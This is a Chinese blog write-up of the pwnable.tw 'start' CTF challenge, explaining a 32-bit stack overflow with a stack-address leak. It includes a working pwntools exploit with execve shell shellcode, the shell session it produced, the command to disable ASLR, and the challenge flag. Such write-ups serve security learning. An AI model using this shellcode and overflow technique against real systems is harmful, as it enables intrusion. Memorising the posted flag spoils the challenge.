ret2shellcode

最新推荐文章于 2024-01-24 17:14:26 发布
最新推荐文章于 2024-01-24 17:14:26 发布
阅读量935 收藏
点赞数
文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/airuozhaoyang/article/details/99311625
版权

start

bin: https://pwnable.tw/challenge/#1

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : disabled

反汇编

.text:08048060                 public _start
.text:08048060 _start          proc near               ; DATA XREF: LOAD:08048018↑o
.text:08048060                 push    esp
.text:08048061                 push    offset _exit
.text:08048066                 xor     eax, eax
.text:08048068                 xor     ebx, ebx
.text:0804806A                 xor     ecx, ecx
.text:0804806C                 xor     edx, edx
.text:0804806E                 push    3A465443h	// push字符串:  'CTF:'
.text:08048073                 push    20656874h	// push字符串:  'the '
.text:08048078                 push    20747261h	// push字符串:  'art '
.text:0804807D                 push    74732073h	// push字符串:  's st'
.text:08048082                 push    2774654Ch	// push字符串:  'Let''
													// Let's start the CTF:
.text:08048087                 mov     ecx, esp        ; addr
.text:08048089                 mov     dl, 14h         ; len
.text:0804808B                 mov     bl, 1           ; fd
.text:0804808D                 mov     al, 4
.text:0804808F                 int     80h             ; LINUX - sys_write
													// sys_write(1, esp, 14h)
.text:08048091                 xor     ebx, ebx
.text:08048093                 mov     dl, 60
.text:08048095                 mov     al, 3
.text:08048097                 int     80h             ; LINUX - sys_read
													// sys_read(0, esp, 60 )
.text:08048099                 add     esp, 14h
.text:0804809C                 retn
.text:0804809C _start          endp ; sp-analysis failed
.text:0804809C
.text:0804809D
.text:0804809D ; =============== S U B R O U T I N E =======================================
.text:0804809D
.text:0804809D ; Attributes: noreturn
.text:0804809D
.text:0804809D ; void exit(int status)
.text:0804809D _exit           proc near               ; DATA XREF: _start+1↑o
.text:0804809D                 pop     esp
.text:0804809E                 xor     eax, eax
.text:080480A0                 inc     eax
.text:080480A1                 int     80h             ; LINUX - sys_exit
.text:080480A1 _exit           endp ; sp-analysis failed
.text:080480A1
.text:080480A1 _text           ends
.text:080480A1
.text:080480A1
.text:080480A1                 end _start

本地运行:


本地关闭aslr, echo 0 > /proc/sys/kernel/randomize_va_space

执行 sys_read时,栈如下
在这里插入图片描述
可见,我们可以控制ret_addr地址。

.text:08048099                 add     esp, 14h
.text:0804809C                 retn

在执行完add esp, 14h时, 栈如下:
在这里插入图片描述
随后执行retn
在这里插入图片描述
如果此时将ret_addr 改成 mov ecx, esp 指令处程序就又执行了 sys_write, 执行代码为 sys_write(1, esp, 20)
而此时 esp 指向的值即为esp, 所以首先可以获得到esp的值。
程序继续执行到sys_read(),这时,可以构造payload。从esp开始的60字节, 同时sys_read 函数执行后,还需要执行add esp, 0x14, 所以shellcode的长度最多为40字节。

from pwn import *

debug = 0

if debug:
	sh = process("./start")
else:
	sh = remote("chall.pwnable.tw", 10000)

def leak_stack_addr():
	sh.recvuntil(':')
	payload = 'a' * 20 + p32(0x08048087)
	sh.send(payload)
	stack_addr = sh.recv(4)
	return u32(stack_addr)


def pwn(addr):
	nopsled = '\x90' * 15
	shellcode = '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
	payload = 'a' * 0x14 + p32(addr + 20) + nopsled + shellcode
	# 0x14 + 4 + 10 + 21
	sh.send(payload)
	sh.interactive()

def exp():
	sa = leak_stack_addr()
	pwn(sa)


exp()

root@ubuntu:~/pwn/start# python 1.py
[+] Opening connection to chall.pwnable.tw on port 10000: Done
[*] Switching to interactive mode
\x00\x00\x005\x0f��\x00\x00\x00G\x0f��id
uid=1000(start) gid=1000(start) groups=1000(start)
$ cd /home/start
$ ls
flag
run.sh
start
$ cat flag
FLAG{Pwn4bl3_tW_1s_y0ur_st4rt}

利用条件

1、程序存在溢出,并且还要能够控制返回地址
2、程序运行时,shellcode 所在的区域要拥有执行权限
3、操作系统还需要关闭 ASLR (地址空间布局随机化) 保护 。

links:

https://syscalls.kernelgrok.com/
https://www.freebuf.com/vuls/179724.html

朝向高处的旅途
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pwn小白入门04---ret2shellcode
weixin_45943522的博客
02-21 1845
原理 ret2shellcode,当程序当中没有system函数时,我们需要自己往栈上写入一段shellcode,然后控制eip使其指向shellcode的地址。 shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。 在栈溢出的基础上,要想执行 shellcode,需要对应的程序在运行时,shellcode 所在的区域具有可执行权限。即必须关闭堆栈不可执行功能。 例题(来自ctfwiki): 首先checksec: 发现程序没有开启任何保护,并且存在可读可写
PWN · ret2shellcode】[HNCTF 2022 Week1]ret2shellcode
Mr_Fmnwon的博客
04-25 2766
ret2shellcode——顾名思义,控制执行流到shellcode在更简单的一类题目ret2text中,我们主要的尝试是修改某个返回地址修改,修改到程序固有的后门函数处,劫持程序控制流以期返回后门。然而,如果程序中并不存在这样的后门函数,那么很朴素的想法是,能不能自己写一段后门函数,然后劫持程序控制流返回执行这段恶意代码呢?依此,主要的过程如下:(1)构造shellcode通过溢出放到程序某片存储空间上——为了能够执行这段代码,所存储的区域需要有可执行的权限。
简单的PWN学习-ret2shellcode
weixin_48421613的博客
07-05 812
最近在学习pwn,这是一道2016年的pwn题目,主要学习关于栈溢出以及劫持栈指针达到命令执行的效果,笔者水平较差,请轻喷
ret2shellcode 学习
最新发布
akdelt的博客
01-24 506
shellcode 之前提了,ret2shellcode是指攻击者需要自己将调用shell的机器码(也称shellcode)注入至内存中,随后利用栈溢出复写return_address,进而使程序跳转至shellcode所在内存。若某个程序的bss段可写且可执行,攻击者就可以尝试将shellcode注入写入全局变量或静态变量中。若某个程序的heap段可写且可执行,攻击者就可以尝试将shellcode注入至动态分配的变量中。在虚拟内存中,data段主要保存的是已经初始化了的全局变量或静态变量。
Lab2-Return-To-Libc
11-10
Return-to-libc攻击是缓冲区溢出攻击的一种变种,它不依赖于执行已知的shellcode,而是利用程序库函数(如libc)中的现有代码来执行攻击者想要的操作。这种方法的优势在于,即使在DEP开启的情况下,由于系统函数通常...
Delphi编写ShellCode的示例
02-22
$C3, // ret // ShellCode Args $43, $6d, $64, $2e, $65, $78, $65, $00, // "cmd.exe" $00, $00, $00, $00, $00, $00, $00, $00, // null-terminated $00, $00, $00, $00, $00, $00, $00, $00, // empty ...
带exp的pwn测试文件
09-12
这些文件涵盖了多种经典的漏洞利用技术,如ret2text、ret2syscall、ret2shellcode、ret2libc、ret2csu、stack_pivoting、stack_smash以及SROP(Secure Return Oriented Programming)和frame_faking。下面将详细介绍...
Win 7下定位kernel32.dll基址及shellcode编写1
08-03
Ret ``` 这个新方法可以跨版本地在32位的Windows 5.0到7.0中工作,确保了shellcode的兼容性。 shellcode是直接在内存中执行的代码,通常用于执行特定任务,如启动计算器程序(calc.exe)。在Windows 7中,可以...
HITCON-Training-Writeup:https的简要说明
04-29
HITCON培训 我为做了简短的 有关Linux二进制开发的信息,请参见。 环境设定 ...返回文本/ Shellcode 实验3-ret2shellcode 保护ASLR / DEP / PIE / StackGuard 延迟绑定 返回图书馆实验4-ret2lib 面向返
PWN-ret2shellcode原理
m0_64180167的博客
04-17 530
我们之前做过很简单的pwn题目buuctf-rip这种 是在程序中存在shellcode 直接返回地址改为这个shellcode的地址即可但是如果程序里面没有呢这种类型就是ret2shellcode
英招杯 pwn2(ret2shellcode
qq_53928256的博客
11-16 288
由于程序运行时,即输出了输入值s的存放首地址,我们输入的首地址与shellcode之间的距离是0x3c-0x28=0x14,故只需返回s的首地址加上0x14即可;我们分析main函数的时候可以看到栈中的s距离rbp还有一段距离,且程序的NX保护未开启,我们可以考虑写入shellcode在栈中执行。根据图中与rbp的偏移,我们相对比较容易的出var_30对应的变量为v5,var_8对应的变量为v10。在网上我们可以查到相对较短的syscall系统调用的shellcode为23字节,满足我们所需的要求。
PWN --- ret2shellcode
qq_41696518的博客
06-28 866
PWN ret2shellcode
好好说话之ret2shellcode
hollk’s blog
06-22 1709
本题为ret2shellcode-example 题目路径 /ctf-challenges/pwn/stackoverflow/ret2shellcode/ret2shellcode-example 一、原理 ret2shellcode,即控制程序执行 shellcode 代码。shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。一般来说,shell...
ctfhubret2shellcode
m0_75234353的博客
04-02 361
要把shellcode写入返回地址之后,所以shellcode地址为16+8+8=32。还要再覆盖上父函数的栈底的指针信息,因为是64架构,所以有8字节。发现stack的权限有rwx,本题的攻破点就在栈上了。由图可得:buf距rbp 0x10,也就是16个字节。连接成功,即可得flag。
Rop-Ret2Shellcode-64位实例
fanghuapyk的博客
03-19 826
Rop-Ret2Shellcode-64位实例 前面写过了32位的shellcode,这次继续64位shellcode,当我们的64位程序中没有system函数,并且开启了NX保护时,这时我们需要用到64位的shellcode来执行execve(“/bin/sh”,null,null); 如何编写shellcode呢? ①想办法调用execve("/binsh" , null, null); ②借助栈来传入字符串/bin/sh ③系统调用execve rax = 0x3b(64bit) rdi = bin_
缓冲区溢出-CTF-PWN
04-28
<img src="https://img-bss.csdn.net/202004281305056475.jpg" alt="" />
与ret2shellcode的初相识
gclome的博客
07-29 647
本文首发于freebuf,是自己发在安全媒体的第一篇文章 发现freebuf的网名好像不可以修改,后悔当时随便起的这个名字了!害~ 0x00 ret2shellcode简介 ret2shellcode,也就是return to shellcode,在执行完某个函数之后,跳到shellcode上,达到get shell的目的。 ret2shellcode关键在于我们找到一个可读可写可执行的缓冲区,接下来把我们的shellcode放到这个缓冲区,然后跳转到我们的shellcode处执行 。 0x01 示例一 先
ret2shellcode知识点及例题
weixin_44864859的博客
05-19 847
ret2shellcode 检查程序的基础信息后发现和ret2text不同的是其关闭了nx防护,这就代表IP寄存器可以指向堆,栈了。 运行程序可以看到只有一个输入,接下来用ida打开进行分析。 与ret2text一样可以很明显的看到在main函数中调用了gets函数。我们同样可以控制返回地址,但返回到什么地方呢? 查看内部函数可以看到,此时程序中并没有用到system函数,那应该怎么办呢? 这里需要注意有两个点 1 NX: NX disabled 2 strncpy(buf2, &a

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值